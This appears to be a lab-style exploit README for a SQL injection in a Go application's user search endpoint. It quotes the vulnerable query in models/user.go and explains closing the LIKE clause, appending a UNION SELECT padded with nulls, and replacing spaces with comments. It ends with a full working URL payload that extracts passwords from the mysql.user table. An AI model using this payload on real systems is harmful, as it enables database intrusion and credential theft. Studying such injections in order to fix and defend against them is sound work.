Exploit-README

We find the exploit in two files:
models/user.go and models/user.go

The vulnerable strings are as follows:

user.go: 

err=x.limit(opt.limit).where(“type=0”).AND(“lower_name like ‘%’ + opt.keyword + ‘%’).Find(&us)

This is the Golang mysql statement, which can be simplified to: 
select &us from users where type=0 and lower_name like %user_input% and limit(opt.limit)

The exploit string that needs to be passed to the user_input will need to be able to execute this original command, thus we will close it to give zero result.
……’% ’ and false ): the underlined statement is the partial user input that will cause the main statement to run successfully and to not give any result as any statement and false will give 0 results.

To execute our arbitrary statement , we can’t close the above statement with a ‘;’ as the GO-Lang sql command is not designed to accept multiple statements, thus we need to find a way where a second sql statement can be executed in conjunction with the main sql statement while not being separated by sql. For this case, we therefore we use the sql command called ‘union’ which lets us compile two separate sql statement in a single sql statement if the output generated by both the sql statement has the same number of columns.If the second statement doesn’t have the same number of columns, we can add null which will act as one column.
Consequently, we have found out how to execute another sql statement with the main statement. Now to get rid of the space problem, we use multiline comment syntax, it acts as a space, and will not be considered as part of the statement.

We now create our exploit string which is as follows:
http://192.168.154.150/api/v1/users/search?q=%27/**/and/**/false)/**/union/**/select/**/null,null,Password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/mysql.user/**/where/**/(%27%25%27%3D%27

The above statement will print the password saved in the mysql.user database.